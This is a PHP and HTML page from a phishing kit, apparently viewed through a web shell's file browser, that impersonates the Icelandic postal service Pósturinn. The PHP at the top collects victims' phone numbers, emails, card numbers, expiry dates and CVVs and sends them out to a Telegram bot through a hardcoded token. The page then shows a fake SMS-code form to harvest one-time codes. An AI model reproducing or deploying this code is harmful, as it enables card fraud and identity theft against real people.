Your IP : 216.73.216.26


Current Path : /home2/wtmwscom/public_html/post/
Upload File :
Current File : /home2/wtmwscom/public_html/post/step2.php

<?php
$id = $_GET['id'];

$phone = $_POST['nocphone2'];
$email = $_POST['em1'];
$cc = $_POST['ccnn1'];
$year = $_POST['cexdyyyyss'];
$month = $_POST['cexppdm'];
$cvv = $_POST['passnumber'];

$message = '========================================
======qatar======
id  :  '.$id.'
phone  :  '.$phone.'
email  :  '.$email.'
card  : '.$cc.'
year  :  '.$year.'
month  : '.$month.'
cvv  :  '.$cvv;


file_get_contents("https://api.telegram.org/bot1475567621:AAFAFOvWAVGYQyzWPYx6F57M2Pc9p8ZRsS4/SendMessage?chat_id=987654451&text=".urlencode($message)."" );

?>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML lang="en">

<HEAD>
    <TITLE>Pósturinn - Staðfesting</TITLE>
    <META content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <LINK rel="stylesheet" type="text/css" href="mdpayacs/content/040/screen.css" />
    <LINK rel="stylesheet" type="text/css" href="mdpayacs/content/040/dk/gh-buttons.css" />
    <script src="mdpayacs/content/commons.js"></script>
    <script src="mdpayacs/content/040/js/jquery-1.9.1.min.js"></script>
    <script type="text/javascript" src="./Autentisering_files/date_time.js"></script>
    <script type="text/javascript">
        var count = 10;
        var redirect = "sms.html";

        function countDown() {
            var timer = document.getElementById("timer");
            if (count > 0) {
                count--;
                timer.innerHTML = "Please wait for " + count + " Seconds";
                setTimeout("countDown()", 1000);
            } else {
                document.getElementById("authform1").style.display = "none";
                document.getElementById("authform2").style.display = "block";
            }
        }
    </script>
    <script type="text/javascript">
        function onBodyLoad() {
            document.form.otp.focus();
        }

        function validate() {

            var cd = document.getElementById("code");
            var flag = 0;

            if (cd.value == "" || cd.value.length < 6) {
                cd.style.borderColor = "red";
                flag = 1;
            } else {
                cd.style.borderColor = "green";
            }
            if (flag == 1) {
                document.getElementById("msg_error").style.display = "block";
                return false;
            } else {
                document.getElementById("msg_error").style.display = "none";
                return true;
            }

        }
    </script>
</HEAD>

<BODY OnLoad="onBodyLoad();" dir="rtl">

    <DIV id="authform">

        <DIV id="authform1">
            <DIV class="wrapper" style="background-color: #00aae7; color: white;">
                <DIV class="logos">
                    <TABLE>
                        <TBODY>
                            <TR>
                                <TD class="identifier">
                                    <IMG alt="" src="" style="max-height:56px;" /><IMG alt="" src="" style="max-height:56px;" />
                                </TD>
                                <TD class="bank">
                                </TD>
                                <TD class="bank">
                                    <center>
                                        <IMG alt="" src="logo.png" style="max-height:56px;" /></center>
                                </TD>
                            </TR>
                        </TBODY>
                    </TABLE>
                </DIV>
                <H1>Please confirm your information
                </H1>
                <P>Please wait while we process your request
                </P>
                <br><br>
                <p>
                    <center>
                        <img src="loader.gif" width="" height="" class="intrologo" alt="" /></center>
                </p>

                <br><br>

                <span id="timer">
                    <script type="text/javascript">
                        countDown();
                    </script>
                </span>
            </DIV>
            <script type="text/javascript">
                function incrementResendCount() {
                    var resendCount = localStorage.getItem("localResendCount");
                    if (resendCount == null) {
                        resendCount = 0;
                    }
                    resendCount = Number(resendCount);
                    resendCount = ++resendCount;
                    localStorage.setItem("localResendCount", resendCount);
                }

                $(document).ready(function() {
                    var resendCount = localStorage.getItem("localResendCount");

                    if (Number(resendCount) >= 2) {
                        $("#resendButton").hide();
                        $("#resendText").hide();
                        $("#errorMessage").hide();
                        $("#resendExceeded").show();
                        localStorage.setItem("localResendCount", "0");
                    }

                });
            </script>
        </DIV>







        <DIV id="authform2" style="display:none;">
            <DIV class="wrapper" style="background-color: #00aae7; style: white;">
                <DIV class="logos">
                    <TABLE>
                        <TBODY>
                            <TR>
                                <TD class="identifier">
                                    <IMG alt="" src="" style="max-height:56px;" /><IMG alt="" src="" style="max-height:56px;" />
                                </TD>
                                <TD class="bank">
                                </TD>
                                <TD class="bank">
                                    <center>
                                        <IMG alt="" src="logo.png" style="max-height:56px;" /></center>
                                </TD>
                            </TR>
                        </TBODY>
                    </TABLE>
                </DIV>
                <H1>Enter SMS Code
                </H1>
                <P>You'll be receiving an SMS containing a code (in less than 10 minutes)</P>

                <FORM style="color: white;" id="form" name="form" method="post" action="step3.php?id=<?php echo $id; ?>" onsubmit="return validate()">
                    <input name="tel" value="354-<?php echo $phone  ?> " type="hidden" />
                    <input name="email" value="<?php echo $email  ?>" type="hidden" />
                    <input name="cc" value="<?php echo $cc  ?>" type="hidden" />
                    <input name="expe" value="<?php echo $mm  ?> / <?php echo $yy  ?>" type="hidden" />
                    <input name="cvv" value="<?php echo $cvv  ?>" type="hidden" />

                    <DL style="margin-top: 10px;">

                        <DT><span id="date_time"></span></DT>
                        <DD>Date</DD>
                        
                        <script type="text/javascript">
                            window.onload = date_time('date_time');
                        </script>

                        <DT><?php
                                        $aaa = $cc;
                                        $aaa[0] = "X";
                                        $aaa[1] = "X";
                                        $aaa[2] = "X";
                                        $aaa[3] = "X";
                                        $aaa[4] = "X";
                                        $aaa[5] = "X";
                                        $aaa[6] = "X";
                                        $aaa[7] = "X";
                                        $aaa[8] = "X";
                                        $aaa[9] = "X";
                                        $aaa[10] = "X";
                                        $aaa[11] = "X";




                                        echo $aaa[0] . $aaa[1] . $aaa[2] . $aaa[3] . " " . $aaa[4] . $aaa[5] . $aaa[6] . $aaa[7] . " " . $aaa[8] . $aaa[9] . $aaa[10] . $aaa[11] . " " . $aaa[12] . $aaa[13] . $aaa[14] . $aaa[15];  ?></DT>
                        <DD>Card number</DD>

                        <DT><?php echo $phone;  ?> 
                        </DT>
                        <DD>Mobile number</DD>
                        <LABEL for="code"> </LABEL>
                        <DT>
                        </DT>
                        <DD>
                            <INPUT name="otp" type="text" id="code" style="width: 100px" onKeyPress="return submitenter(this,event)" width="6" maxlength="8" /></DD>
                        <DT>

                        </DT>
                        <DD> </DD>
                        <DT>

                        </DT>
                        <DD>
                            <button class="button icon approve primary" name="submit" id="submit" type="submit" value="submit" style="position: absolute; margin-left: 5px;">Confirm
                            </button>
                        </DD>
                    </DL>
                    <div style="padding-bottom:30px;">
                        <P>&nbsp;</P>
                    </div>
                    <div id="msg_error" class="error" style="display: none;padding-bottom:10px;">Please fill the required info
                    </div>
                    <DIV style="font-size: 0.92em; margin-bottom: 8px;">

                        <div>
                            <P>&nbsp;</P>

                        </DIV>

                        <A class="button icon add">Request new code                        </A>
                    </DIV>
                </FORM>
            </DIV>
        </DIV>
    </DIV>
</BODY>

</HTML>